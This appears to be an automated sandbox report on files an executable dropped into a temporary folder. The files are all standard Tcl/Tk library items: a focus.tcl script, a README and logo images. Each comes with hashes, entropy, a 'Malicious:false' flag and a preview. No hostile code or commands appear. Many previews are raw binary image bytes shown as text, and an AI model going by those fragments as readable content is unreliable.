                                                                                                                                                                                                                                                    Preview:# focus.tcl --.#.# This file defines several procedures for managing the input.# focus..#.# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_focusNext --.# This procedure returns the name of the next window after "w" in.# "focus order" (the window that should receive the focus next if.# Tab is typed in w). "Next" is defined by a pre-order search.# of a top-level and its non-top-level descendants, with the stacking.# order determining the order of siblings. The "-takefocus" options.# on windows determine whether or not they should be skipped..#.# Arguments:.# w -..Name of a window...proc ::tk_focusNext w {. set cur $w. while {1} {...# Descend to just before the first child of the current widget....set parent $cur..set children [winfo children $cur]..set i -1...# Look for the next sibling that isn't a top-level....while {1} {.. incr i..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\README

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):322
                                                                                                                                                                                                                                                    Entropy (8bit):4.341180398587801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:nVhmHdeA1xNZgkrIf3Ju4dFi6VbGWrWhr3W7FxmVFraGVAJFKyVQR7icrtpwB:nPqf1fZgZA4FJbB6dm7FUjAJVVMM
                                                                                                                                                                                                                                                    MD5:FC8A86E10C264D42D28E23D9C75E7EE5
                                                                                                                                                                                                                                                    SHA1:F1BA322448D206623F8FE734192F383D8F7FA198
                                                                                                                                                                                                                                                    SHA-256:2695ADFF8E900C31B4D86414D22B8A49D6DD865CA3DD99678FA355CDC46093A8
                                                                                                                                                                                                                                                    SHA-512:29C2DF0D516B5FC8E52CB61CFCD07AF9C90B40436DFE64CEFDB2813C0827CE65BA50E0828141256E2876D4DC251E934A6854A8E0B02CDAF466D0389BD778AEF0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:README - images directory..This directory includes images for the Tcl Logo and the Tcl Powered.Logo. Please feel free to use the Tcl Powered Logo on any of your.products that employ the use of Tcl or Tk. The Tcl logo may also be.used to promote Tcl in your product documentation, web site or other.places you so desire..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\logo.eps

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32900
                                                                                                                                                                                                                                                    Entropy (8bit):5.235207715374815
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:gGTVOEcRWsdEmhp6k/GLrPMlK3pJr/IbYDGDMtBF2Fz6fsFA/fSvqHWukLI2d0Nr:gGTVOEcRWsdEvLrPJ5Jr/IbYDGDMtBFh
                                                                                                                                                                                                                                                    MD5:45175418859AF67FE417BD0A053DB6E5
                                                                                                                                                                                                                                                    SHA1:2B499B7C4EBC8554ECC07B8408632CAF407FB6D5
                                                                                                                                                                                                                                                    SHA-256:F3E77FD94198EC4783109355536638E9162F9C579475383074D024037D1797D3
                                                                                                                                                                                                                                                    SHA-512:114A59FD6B99FFD628BA56B8E14FB3B59A0AB6E752E18DEA038F85DBC072BF98492CE9369D180C169EDE9ED2BD521D8C0D607C5E4988F2C83302FC413C6D6A4C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL/TK LOGO.ILLUS).%%CreationDate: (8/1/96) (4:58 PM).%%BoundingBox: 251 331 371 512.%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%DocumentCustomColors: (TCL RED).%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Level 2 Emul

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\logo100.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2341
                                                                                                                                                                                                                                                    Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                                                    MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                                                    SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                                                    SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                                                    SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\logo64.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1670
                                                                                                                                                                                                                                                    Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                                                    MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                                                    SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                                                    SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                                                    SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\logoLarge.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11000
                                                                                                                                                                                                                                                    Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                                                    MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                                                    SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                                                    SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                                                    SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......*\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.*^.x.....J.L.!.'........=+eZ..i..ynF.8...].y|..m.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\logoMed.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3889
                                                                                                                                                                                                                                                    Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                                                    MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                                                    SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                                                    SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                                                    SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.*&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..*K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\pwrdLogo.eps

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):27809
                                                                                                                                                                                                                                                    Entropy (8bit):5.331778921404698
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:geQTVOEcRWsdEmhp6k/GLrPMlK3pJrNIbYDGDMtBgu2Fz6lR5G/r+FWaGK:gnTVOEcRWsdEvLrPJ5JrNIbYDGDMtB9L
                                                                                                                                                                                                                                                    MD5:BA1051DBED2B8676CAA24593B88C91B2
                                                                                                                                                                                                                                                    SHA1:8A58FC19B20BFDC8913515D9B32CCBF8ACF92344
                                                                                                                                                                                                                                                    SHA-256:2944EBC4AF1894951BF9F1250F4E6EDF811C2183745950EA9A8A926715882CF7
                                                                                                                                                                                                                                                    SHA-512:4260CEBA7DA9463F32B0C76A2AC19D2B20C8FE48CFBA3DC7AF748AAE15FA25DCBDA085072DF7EFC8F4B4F304C7ED166FE9F93DC903E32FA1874E82D59E544DEF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL PWRD LOGO.ILLUS).%%CreationDate: (8/1/96) (4:59 PM).%%BoundingBox: 242 302 377 513.%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Le

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\pwrdLogo100.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1615
                                                                                                                                                                                                                                                    Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                                                    MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                                                    SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                                                    SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                                                    SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8O*Z.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.|..pf!..&.......8.#.8.....*..J>. .t..h6(........#..0.A...*!..)...x..u.Z....*%..H.....*.......`......|.....1.......&.....T*...f.l...

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\pwrdLogo150.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2489
                                                                                                                                                                                                                                                    Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                                                    MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                                                    SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                                                    SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                                                    SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\pwrdLogo175.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2981
                                                                                                                                                                                                                                                    Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                                                    MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                                                    SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                                                    SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                                                    SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....*0p}..KP?c.\@KW.S(..M..B.....-q...S2...*.,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.*4..(........*..F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\pwrdLogo200.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3491
                                                                                                                                                                                                                                                    Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
                                                                                                                                                                                                                                                    MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                                                    SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                                                    SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                                                    SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R...*...J.p.A.t.*..$A*...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y1*35.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. ...*..Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'|..M9..."...,*.......

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\pwrdLogo75.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1171
                                                                                                                                                                                                                                                    Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                                                    MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                                                    SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                                                    SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                                                    SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
